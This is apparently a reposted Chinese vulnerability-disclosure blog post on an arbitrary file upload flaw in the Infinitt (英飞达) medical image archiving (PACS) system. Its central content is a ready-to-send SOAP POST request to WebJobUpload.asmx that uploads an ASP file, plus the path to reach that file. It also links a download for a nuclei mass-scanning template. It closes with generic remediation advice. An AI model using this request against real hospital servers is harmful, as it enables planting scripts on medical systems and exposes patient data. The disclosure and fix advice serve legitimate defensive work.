英飞达医学影像存档与通信系统任意文件上传

admin

107255
文章

89
评论

2024年5月23日00:25:03评论35 views字数 1196阅读3分59秒阅读模式

0x01漏洞描述

英飞达医学影像存档与通信系统 WebJobUpload接口存在任意文件上传，攻击者可通过此漏洞上传恶意脚本文件，对服务器的正常运行造成安全威胁！

英飞达医学影像存档与通信系统任意文件上传

0x02 漏洞复现

POC如下所示：

POST /webservices/WebJobUpload.asmx HTTP/1.1Host: xxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: text/xml; charset=utf-8Soapaction: "http://rainier/jobUpload"Connection: closeContent-Length: 506

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <jobUpload xmlns="http://rainier"> <vcode>1</vcode> <subFolder></subFolder> <fileName>xfoward.asp</fileName> <bufValue>MTIzNDU2</bufValue> </jobUpload> </soap:Body></soap:Envelope>

链接地址如下所示：url+/1/xfoward.asp

英飞达医学影像存档与通信系统任意文件上传

0x03nuclei批量检测

英飞达医学影像存档与通信系统任意文件上传

获取方式：

链接：https://pan.baidu.com/s/1yaoh3ZCaaURhse4l4D3gjw?pwd=vno8 提取码：vno8

　修复建议

　　1、对上传文件类型进行验证，除在前端验证外在后端依然要做验证，后端可以进行扩展名检测，重命名文件，MIME类型检测以及限制上传文件的大小等限制来防御，或是将上传的文件其他文件存储服务器中。

　　2、严格限制和校验上传的文件，禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限，防止木马执行。

　　3、对上传文件格式进行严格校验，防止上传恶意脚本文件；

　　4、严格限制上传的文件路径。

　　5、文件扩展名服务端白名单校验。

　　6、文件内容服务端校验。

　　7、上传文件重命名。

　　8、隐藏上传文件路径。

原文始发于微信公众号（爱喝酒烫头的曹操）：英飞达医学影像存档与通信系统任意文件上传

左青龙
微信扫一扫

右白虎
微信扫一扫

英飞达医学影像存档与通信系统任意文件上传

SolarWinds Serv-U FTP 目录遍历文件读取漏洞(CVE-2024-28995)

SolarWinds Serv-U FTP 目录遍历致文件读取漏洞（CVE-2024-28995）

Magento Open Source XXE漏洞（CVE-2024-34102）

用友分析云存在druid未授权访问漏洞

CVE-2023-42793：TeamCity认证绕过RCE漏洞

CVE-2024-23917：TeamCity认证绕过RCE漏洞

Serv-U FTP 目录遍历（CVE-2024-28995）

「漏洞复现」海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

没有秘密 || 利用 Veeam CVE-2024-29855

海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

发表评论

在线咨询

微信